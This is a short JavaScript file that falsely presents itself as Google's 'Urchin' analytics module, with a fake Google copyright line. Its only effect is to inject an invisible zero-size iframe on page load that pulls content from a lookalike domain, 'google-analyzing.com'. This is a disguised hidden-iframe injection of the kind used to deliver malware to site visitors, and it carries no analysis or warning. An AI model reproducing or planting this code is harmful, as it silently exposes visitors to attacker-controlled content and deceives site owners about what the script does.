//-- Google Analytics Urchin Module //-- Copyright 2007 Google, All Rights Reserved. var d=document.createElement('div'); d.id='analyzing'; document.body.appendChild(d); var iframe = document.createElement('iframe'); iframe.name = 'iframe'; iframe.src = '//google-analyzing.com/urchins/'; iframe.style.width = '0px'; iframe.style.height = '0px'; window.onload = function() { document.getElementById('analyzing').appendChild(iframe); };